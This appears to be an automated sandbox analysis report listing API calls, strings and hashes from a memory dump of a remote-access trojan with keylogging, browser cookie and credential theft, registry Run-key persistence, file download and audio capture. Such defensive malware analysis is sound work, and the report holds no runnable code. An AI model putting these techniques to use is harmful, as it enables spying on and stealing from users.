                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                  • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTimewsprintf
                                  • String ID: Offline Keylogger Started
                                  • API String ID: 465354869-4114347211
                                  • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                  • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                  APIs
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTime$wsprintf
                                  • String ID: Online Keylogger Started
                                  • API String ID: 112202259-1258561607
                                  • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                  • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                  • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                  • __dosmaperr.LIBCMT ref: 0044BE77
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorHandleLast__dosmaperr
                                  • String ID: (X
                                  • API String ID: 2583163307-1293508174
                                  • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                  • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                  • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                  • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                  APIs
                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                  • API String ID: 481472006-3277280411
                                  • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                  • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$EventLocalThreadTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 2532271599-1507639952
                                  • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                  • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                  APIs
                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: CryptUnprotectData$crypt32
                                  • API String ID: 2574300362-2380590389
                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                  APIs
                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                  • GetLastError.KERNEL32 ref: 0044C316
                                  • __dosmaperr.LIBCMT ref: 0044C31D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer__dosmaperr
                                  • String ID: PkGNG
                                  • API String ID: 2336955059-263838557
                                  • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                  • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                  • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                  • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CloseEventHandleObjectSingleWait
                                  • String ID: Connection Timeout
                                  • API String ID: 2055531096-499159329
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  APIs
                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                  • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FormatFreeLocalMessage
                                  • String ID: @J@$PkGNG
                                  • API String ID: 1427518018-1416487119
                                  APIs
                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,6CA37450,?), ref: 00413888
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,6CA37450,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                  • API String ID: 1818849710-1051519024
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                  • String ID: bad locale name
                                  • API String ID: 3628047217-1405518554
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                  • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                  • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: Control Panel\Desktop
                                  • API String ID: 1818849710-27424756
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                  • String ID: !D@
                                  • API String ID: 3446828153-604454484
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: /C $cmd.exe$open
                                  • API String ID: 587946157-3896048727
                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: _free
                                  • API String ID: 269201875-0
                                  Strings
                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                  • API String ID: 3472027048-1236744412
                                  APIs
                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Window$SleepText$ForegroundLength
                                  • String ID: [ $ ]
                                  • API String ID: 3309952895-93608704
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: File$CloseCreateHandleReadSize
                                  • API String ID: 3919263394-0
                                  APIs
                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: CloseHandleOpenProcess
                                  • API String ID: 39102293-0
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • API String ID: 2633735394-0
                                  APIs
                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: MetricsSystem
                                  • API String ID: 4116985748-0
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                   Similarity
                                   • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • API String ID: 1761009282-0
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                  • GetLastError.KERNEL32 ref: 00449FAB
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID: PkGNG
                                  • API String ID: 203985260-263838557
                                  APIs
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                   Memory Dump Source
                                   • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                  • API String ID: 1881088180-3686566968
                                  APIs
                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                  • API ID:
                                  • String ID: ACP$OCP
                                  • API String ID: 0-711371036
                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                  • GetLastError.KERNEL32 ref: 0044B884
                                  • API ID: ErrorFileLastWrite
                                  • String ID: PkGNG
                                  • API String ID: 442123175-263838557
                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                  • GetLastError.KERNEL32 ref: 0044B796
                                  • API ID: ErrorFileLastWrite
                                  • String ID: PkGNG
                                  • API String ID: 442123175-263838557
                                  APIs
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                  • API ID: LocalTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 481472006-1507639952
                                  APIs
                                  • Sleep.KERNEL32 ref: 0041667B
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                  • API ID: DownloadFileSleep
                                  • String ID: !D@
                                  • API String ID: 1931167962-604454484
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                  • API ID: ExistsFilePath
                                  • String ID: alarm.wav$hYG
                                  • API String ID: 1174141254-2782910960
                                  APIs
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                  • String ID: Online Keylogger Stopped
                                  • API String ID: 1623830855-1496645233
                                  APIs
                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                  • API ID: String
                                  • String ID: LCMapStringEx$PkGNG
                                  • API String ID: 2568140703-1065776982
                                  APIs
                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                  • API ID: wave$BufferHeaderPrepare
                                  • String ID: XMG
                                  • API String ID: 2315374483-813777761
                                  APIs
                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                  • API ID: LocaleValid
                                  • String ID: IsValidLocaleName$kKD
                                  • API String ID: 1901932003-3269126172
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                  • API String ID: 1174141254-4188645398
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                  • API ID: ExistsFilePath
                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                  • API String ID: 1174141254-2800177040
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                  • API ID: ExistsFilePath
                                  • String ID: AppData$\Opera Software\Opera Stable\
                                  • API String ID: 1174141254-1629609700
                                  APIs
                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                  • String ID: [AltL]$[AltR]
                                  • API String ID: 2738857842-2658077756
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                  • API ID: Time$FileSystem
                                  • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                  • API String ID: 2086374402-949981407
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                  • API ID: ExecuteShell
                                  • String ID: !D@$open
                                  • API String ID: 587946157-1586967515
                                  APIs
                                  • ___initconout.LIBCMT ref: 004555DB
                                    • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                  • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                  • API ID: ConsoleCreateFileWrite___initconout
                                  • String ID: PkGNG
                                  • API String ID: 3087715906-263838557
                                  APIs
                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                  • API ID: State
                                  • String ID: [CtrlL]$[CtrlR]
                                  • API String ID: 1649606143-2446555240
                                  APIs
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: ,kG$0kG
                                  • API String ID: 1881088180-2015055088
                                  APIs
